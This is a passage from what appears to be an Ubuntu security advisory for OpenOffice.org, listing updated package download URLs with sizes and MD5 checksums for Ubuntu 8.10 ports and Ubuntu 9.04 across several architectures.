http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 222748 1dc4400208b0762445fdea569ddd954a http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-qa-tools_2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 211718 d5df29267faf63d27335f7b3a04046a1 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.5+OOo2.4.1-11ubuntu2.2_powerpc.deb Size/MD5: 424478 debb990f9e46af1acb108c116f360a18 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/o/openoffice.org/libmythes-dev_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 147288 fdb40b94050dc37c920cc5a5e18347dd http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base-core_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 453036 d8f01197fe1bedea80fcd0983ea805a3 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 1586096 648792e4a07fd92eecab498777f80a8c http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-calc_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 3637938 d17f522cd9fae247900d8e2e58dec991 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-core_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 23374932 475a23e2d7db6bb475a85c4c865abdc1 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-dev_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 2488874 9445cf62aabb1fcefbdc9ebbc8e278e5 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-draw_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 1635174 e5a430592d30ef3188d889a3011bf527 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-evolution_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 59358 082b359d7278210a5ff2fbbcf352afc0 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 5175920 f50d4ce89e63a02cd7ec4ccc3f07ef29 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gcj_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 2160900 2a49aa952d3ebe23365ba448f31038dc http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gnome_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 60896 d7285898ea8c80209f9906fcb943b607 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gtk_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 133194 10b368eb0f396f97f437e731253ed7f1 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-impress_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 419988 18ede648295e39f8177273e2252843bc http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-kde_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 142738 941803df0773d5618251fedc9689bf1f http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-math_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 203240 ed3dcc4a82220c02ae45e29e2e10fee7 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-officebean_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 47658 95fb5a4b6a75a3786ecab4911766892b http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-report-builder-bin_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 522484 aa2094a5790f811a1a4cef3317999b1d http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-writer_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 4457972 136921b241a13b20616f1dfccf5f3863 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 5012 c08f476664409ed064eb28ee4321845f http://ports.ubuntu.com/pool/main/o/openoffice.org/python-uno_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 86996 a25d894ac23d4f6342c26582536c7174 http://ports.ubuntu.com/pool/main/o/openoffice.org/ure-dbg_1.4+OOo2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 288456 56a001498066c96949b5283758a2f791 http://ports.ubuntu.com/pool/main/o/openoffice.org/ure_1.4+OOo2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 2196126 89de4a54e4f23252c7653175c072a5f3 http://ports.ubuntu.com/pool/universe/o/openoffice.org/cli-uno-bridge_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 23918 891f79efe8a7f13518a2b2f1dc10eee0 http://ports.ubuntu.com/pool/universe/o/openoffice.org/mozilla-openoffice.org_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 28712 25c4c24002c49e189940448fa26de469 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-headless_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 289640 f5e47e8bd3ab22a203e0393019de49b8 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-ogltrans_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 322410 2d6f2d1f02f529d58e30768a92d52907 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 253414 5a001dbb394ffc24a3f8870f55a6c1bf http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-qa-tools_2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 504684 f40d90f796d66280d05a37c7b9f72747 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.5+OOo2.4.1-11ubuntu2.2_sparc.deb Size/MD5: 478786 31b33657c38330ab79ea169ef8b73079 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_3.0.1-9ubuntu3.1.diff.gz Size/MD5: 97442512 8f44eed6b3f150111b39a16901db5231 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_3.0.1-9ubuntu3.1.dsc Size/MD5: 6817 80f92826a8ad9e4b333ffddca72f93f7 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_3.0.1.orig.tar.gz Size/MD5: 332751214 834751a6604a2d87eadf9ccdbae06010 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-common_3.0.1-9ubuntu3.1_all.deb Size/MD5: 17243676 245e40054ef31b709cb4439f5b80e4fa http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-dev-doc_3.0.1-9ubuntu3.1_all.deb Size/MD5: 3381850 9c19042943f49f1b3f96d3ddeaf8ccc8 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-emailmerge_3.0.1-9ubuntu3.1_all.deb Size/MD5: 6772 131fa9aec477d0a7dd188b38bab432b9 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-filter-mobiledev_3.0.1-9ubuntu3.1_all.deb Size/MD5: 93906 5b5bcf14bb63b30bf66bd5221b3c53e3 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-java-common_3.0.1-9ubuntu3.1_all.deb Size/MD5: 4281594 385eafe9b9dae8a52db1a5561709b974 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-in_3.0.1-9ubuntu3.1_all.deb Size/MD5: 2700 5defdbf251c04c8a858036f6b85be2c5 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-l10n-za_3.0.1-9ubuntu3.1_all.deb Size/MD5: 2690 b56777e16efec851a8db6cf1cfdfc614 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-andromeda_3.0.1-9ubuntu3.1_all.deb Size/MD5: 2409312 2dcb9cdc64657656991cca52586b6a91 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-crystal_3.0.1-9ubuntu3.1_all.deb Size/MD5: 4087320 a7370e0c3a7da25c9a06cd83760385d2 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-galaxy_3.0.1-9ubuntu3.1_all.deb Size/MD5: 3913206 0fb3921b375b085cd277f26d9189887a http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-human_3.0.1-9ubuntu3.1_all.deb Size/MD5: 3792598 d5b4fe4c86ebeaac711b10c950b53b4a http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-industrial_3.0.1-9ubuntu3.1_all.deb Size/MD5: 3697906 41625e972750d321f551d6ecdc934f49 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-style-tango_3.0.1-9ubuntu3.1_all.deb Size/MD5: 3710564 54f317c63415e7afa3a8e4cff19ac57b http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ttf-opensymbol_3.0.1-9ubuntu3.1_all.deb Size/MD5: 253792 fe663dc1dc928f04694ca7b722a20f66 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/broffice.org_3.0.1-9ubuntu3.1_all.deb Size/MD5: 100956 82da3bc495068ed77df019103743ac8b http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/libuno-cli-basetypes1.0-cil_1.0.12.0+OOo3.0.1-9ubuntu3.1_all.deb Size/MD5: 209240 80748cf047e3434be6959b0010568c88 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/libuno-cli-cppuhelper1.0-cil_1.0.15.0+OOo3.0.1-9ubuntu3.1_all.deb Size/MD5: 207032 d7521224918dd897a70ffa10cce49fc9 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/libuno-cli-oootypes1.0-cil_1.0.1.0+OOo3.0.1-9ubuntu3.1_all.deb Size/MD5: 362686 d33bdebd6b2ad0a9c7d5495849eb7d0a http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/libuno-cli-ure1.0-cil_1.0.15.0+OOo3.0.1-9ubuntu3.1_all.deb Size/MD5: 208298 835f6c314159afbafe8f136c8beefb3b http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/libuno-cli-uretypes1.0-cil_1.0.1.0+OOo3.0.1-9ubuntu3.1_all.deb Size/MD5: 228596 e97aa312f67d596836cb6ac42e5c6dde http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-dtd-officedocument1.0_3.0.1-9ubuntu3.1_all.deb Size/MD5: 33342 34e50ef93b3e10653b3b7960735bbf63 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-report-builder_1.0.5+OOo3.0.1-9ubuntu3.1_all.deb Size/MD5: 281084 c53186a8e753da0d98cd0989482b88b7 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-style-hicontrast_3.0.1-9ubuntu3.1_all.deb Size/MD5: 2386322 fe5eab566806c36b5db662fe4b022aa4 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-wiki-publisher_1.0+OOo3.0.1-9ubuntu3.1_all.deb Size/MD5: 662314 7e4bc031320a2822f6ca8af170f383bc amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/libmythes-dev_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 156904 d8f344a4be9545b3e9ee52de73c05def http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-base-core_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 553634 e580776905e6a234b966b8a5aa9d2c00 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-base_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 1987784 40787ae63ed35ef0f14c3f4496135ba7 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-calc_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 4238132 e495d61e6167516ca3954c68cd1daced http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-core_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 27047580 166facc0cb3898831baad2f3c42eeb3c http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-dev_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 2539424 50f6c0c914236714abdc87753aa6ae51 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-draw_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 2056244 ed31ea4da97eddb704b971a8d398e725 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-evolution_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 68372 fee56d360ad5fe8c3e05ab3d8b4a27e9 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 6553248 3994869ab913d19d0fdbcdfae2bb34a3 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gcj_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 3396564 5249ae0c58a50c2ff278a47210bed102 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gnome_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 3016 68efb0a296296c887aee2f33842af1e0 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gtk_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 163322 89f43f688e19c9285350a8d3071add79 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-impress_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 462124 2b883f3753a4ee86a5f2a057afeac846 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-kde_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 90640 659d3ab33132bb0fd5b54e749dd2c117 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-math_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 250562 02ff82ccb80a9f11b49243d46a58f000 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-officebean_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 46078 f348111f84c046301d48ef130a6e2c99 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-report-builder-bin_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 896618 7d89f16e1f495d582af9b2a2e9f6d1f7 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-writer_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 5770212 1c1ba97ffde70255b7bfa99d742c2e99 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 5098 1e021015868753445b52dd26c6789eb3 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/python-uno_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 94210 b780895645daed19db5f5758d18c4f04 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/uno-libs3-dbg_1.4.1+OOo3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 203634 45493f5ca2564588954bf4c590d6266c http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/uno-libs3_1.4.1+OOo3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 1113986 72914aa18e250356d075407cd31259ed http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ure-dbg_1.4.1+OOo3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 203504 0c95e8409f0c7248a1aa36575d7aa133 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ure_1.4.1+OOo3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 1435902 e0e624f9a7a51ef204aac248fff0cdc6 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/cli-uno-bridge_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 25074 f31c2133fa415552c188f64dc7fc30f6 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/mozilla-openoffice.org_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 31098 021019903841ea5043e1825896cea6f4 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-kab_3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 284146 5be22615591ed61cf83b5b68689c0ff1 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-pdfimport_0.3.2+OOo3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 880636 fa4808767f074b4a6483691ec85696e1 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 351122 8efd6635344eb00a65b5cfb8d2e966a3 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-presenter-console_1.0+OOo3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 915710 f6be9b282e331e3e82d51c658cc6295f http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.6+OOo3.0.1-9ubuntu3.1_amd64.deb Size/MD5: 463096 5cd35661a1bdd6b28b0e5d43be39f6f0 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/libmythes-dev_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 157416 30ae8d6a2672cfb541b02be08f2359a2 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-base-core_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 526198 b3cf1324a46dc21e495c37bd9f583851 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-base_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 1925606 6d6637863bc996e4e0bd73ed3a35a6c1 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-calc_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 4022280 5ac513ed5b08f77d7656a0636524e649 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-core_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 26054308 5fb79481138caca8a8b071168f667ad9 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-dev_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 2520024 23d8130aedffe9934801e064efcb6ff1 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-draw_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 1995742 a1418fd1e585f5a651e907e95503e2d4 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-evolution_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 64084 be82b3f1b8e4f584f8def447c3ebea97 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 6269176 046cbba6e6627025d2c8351eb9fd9379 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gcj_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 2602832 55c63d6ae33922466621890930128de8 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gnome_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 3012 4cf7b8c1d1b03363f0f9916e36440490 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-gtk_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 155206 5f812fd3e85b2cd78251bf8da01df8b1 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-impress_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 447048 53c3fb6467df7bd65714a7089fa353a4 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-kde_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 86056 25aa98c43739d64201bd7ee27ba0292a http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-math_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 240256 5ebdae48b3278356e6e79d61c102e8ee http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-officebean_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 45914 d086ceb33f1b397091aa6bbffeb5eba5 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-report-builder-bin_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 862882 fb78d5b7ca01ce5cfc64afecf967627d http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org-writer_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 5606492 b9e4b8de9fc9c739b5b85c1459655e2e http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/openoffice.org_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 5096 ad878bf0e1b69282ca107a6152a1d006 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/python-uno_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 90432 1002fc8c840f2f340940fbd1fe9704d3 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/uno-libs3-dbg_1.4.1+OOo3.0.1-9ubuntu3.1_i386.deb Size/MD5: 203932 22f6d6caf3f0bf567ac117cea886956f http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/uno-libs3_1.4.1+OOo3.0.1-9ubuntu3.1_i386.deb Size/MD5: 1093140 f68016be49b9e0d8fa446d021374a419 http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ure-dbg_1.4.1+OOo3.0.1-9ubuntu3.1_i386.deb Size/MD5: 203762 fa9c16f5696a4ee9865843110feacc1c http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org/ure_1.4.1+OOo3.0.1-9ubuntu3.1_i386.deb Size/MD5: 1391614 489aab68ffe456deaef91e2d92c070ca http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/cli-uno-bridge_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 24644 8498f1b1605b91afc9a3e94376c3cd1a http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/mozilla-openoffice.org_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 30396 bea4bb5fe727fd7521d6ee56e381c0c7 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-kab_3.0.1-9ubuntu3.1_i386.deb Size/MD5: 278704 2d7aaba783d5cf5f14641169e8150668 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-pdfimport_0.3.2+OOo3.0.1-9ubuntu3.1_i386.deb Size/MD5: 845412 41a7da195a1c4ad6a1bccaa9347a4d43 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo3.0.1-9ubuntu3.1_i386.deb Size/MD5: 342546 50612f1e88bf70383a4971d45b977e79 http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-presenter-console_1.0+OOo3.0.1-9ubuntu3.1_i386.deb Size/MD5: 901162 4c45e1bd29999a4e6b4292b32d6c85dd http://security.ubuntu.com/ubuntu/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.6+OOo3.0.1-9ubuntu3.1_i386.deb Size/MD5: 426458 2be6694d75ad639590a29ba9e3da6809 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/o/openoffice.org/libmythes-dev_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 157406 63fb26decb775634a5ee8dbffd9f02d6 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base-core_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 537080 0a11a0f23a68a65620024f26194e978f http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-base_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 1963214 5acc53445a71019d865465faac4225be http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-calc_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 4072142 364d451de516da2de0f5f0292b378195 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-core_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 26450476 30f497b7031b7c8895337c1bc98aa949 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-dev_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 2520798 5601420357f1bd992bbeabe6d59914f0 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-draw_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 2024112 46b23807cc6e816579dd4685844826f1 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-evolution_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 65354 fd1d9c74aaf07da7e4106efb0f28ab83 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-filter-binfilter_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 6338386 03a135bb4d74938ccb179e0aacd7fc89 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gcj_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 2827774 8d5578c0a0960f4edc6a041a1090ef59 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gnome_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 3012 26c906b338fa138e0c89ca88cbc468c2 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-gtk_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 156634 6ec5f0599d68f9aa736e503a3d285ebc http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-impress_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 454876 ba323d60ce86c8506dac5ee2e9e7400d http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-kde_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 86782 c595a97690a3c722d69778160cec37c0 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-math_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 241912 7e9b8f36b263f7b6c4c865411d2c1b00 http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-officebean_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 45882 538d1a8aeb7b520cc9987047f6ebdd7a http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-report-builder-bin_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 880664 42e23d87669a957cb77049b435a9f1ae http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org-writer_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 5662754 b9f21918d3805ba1e532027e5608274d http://ports.ubuntu.com/pool/main/o/openoffice.org/openoffice.org_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 5094 ae2f09f0cb3551f1fa669aff948537f0 http://ports.ubuntu.com/pool/main/o/openoffice.org/python-uno_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 92876 8e8b3bb71bb3f7b2bfc63e2390bf2793 http://ports.ubuntu.com/pool/main/o/openoffice.org/uno-libs3-dbg_1.4.1+OOo3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 203934 af6e79485fb5cc4e1e9e5e2377c338f3 http://ports.ubuntu.com/pool/main/o/openoffice.org/uno-libs3_1.4.1+OOo3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 1095772 f3c5bdb5b4c51dd7b372082a7ff1f8eb http://ports.ubuntu.com/pool/main/o/openoffice.org/ure-dbg_1.4.1+OOo3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 203772 b5217ec1e75c6c46ae3f968f65d891f5 http://ports.ubuntu.com/pool/main/o/openoffice.org/ure_1.4.1+OOo3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 1406692 4f0b4f4504efabc874ba40d3c8942624 http://ports.ubuntu.com/pool/universe/o/openoffice.org/cli-uno-bridge_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 24656 038d00bd473ae7efe5532db93580956e http://ports.ubuntu.com/pool/universe/o/openoffice.org/mozilla-openoffice.org_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 30726 97f5c000e6e987514155fdb03504a4f7 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-kab_3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 280834 93e9a2edaf65353161b3298e1aa5b09d http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-pdfimport_0.3.2+OOo3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 856428 e5f02268ae7927a3d52544d088ff7431 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-presentation-minimizer_1.0+OOo3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 351582 272f26cf2dc93f0f4fc2e66b21670250 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-presenter-console_1.0+OOo3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 905960 5088c420941a1748f34c4fe966f5a5a7 http://ports.ubuntu.com/pool/universe/o/openoffice.org/openoffice.org-sdbc-postgresql_0.7.6+OOo3.0.1-9ubuntu3.1_lpia.deb Size/MD5: 439698 76c16f38052d01729ce80ff7554ed9f1 powerpc architecture (Apple Macintosh 